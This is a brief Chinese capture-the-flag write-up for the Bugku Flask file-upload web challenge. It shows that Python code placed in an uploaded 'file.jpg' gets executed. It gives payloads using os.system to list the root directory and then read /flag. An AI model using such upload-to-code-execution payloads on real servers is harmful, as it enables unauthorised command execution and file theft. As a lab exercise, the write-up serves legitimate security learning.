Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
m0_747854525 小时前
mysql如何设置数据库连接字符编码_修改default-character
jvm·数据库·python
誰在花里胡哨5 小时前
Vue<前端页面装修组件>
前端·vue.js
Wyz201210245 小时前
如何在 React 中正确将父组件函数传递给子组件并触发调用
jvm·数据库·python
2401_865439635 小时前
Go语言如何用logrus_Go语言logrus日志框架教程【技巧】
jvm·数据库·python
张元清5 小时前
Pareto 动态路由实战:[slug]、catch-all、嵌套布局
前端·javascript·面试
西西弗Sisyphus5 小时前
Python 在终端里彩色打印
开发语言·python·print·彩色打印
fix一个write十个5 小时前
NativeWind v4 与 React Native UI Kit或三方库样式隔离指南
前端·react native
NotFound4865 小时前
CSS如何利用Flex实现悬浮的侧边按钮组_利用fixed定位与flex布局组合
jvm·数据库·python
qq_189807036 小时前
Golang怎么实现RBAC权限控制_Golang如何用casbin实现基于角色的访问控制系统【教程】
jvm·数据库·python
懂懂tty6 小时前
React中BeginWork和CompleteWork解析
前端·react.js
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点03一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛04基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南05GPT-6核心能力解析及与现有主流大模型对比06零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)07GPT-6发布日深度解析-Symphony架构200万Token实战08从限购到畅通:GLM-5.1 Coding Plan接入攻略09AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析10免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手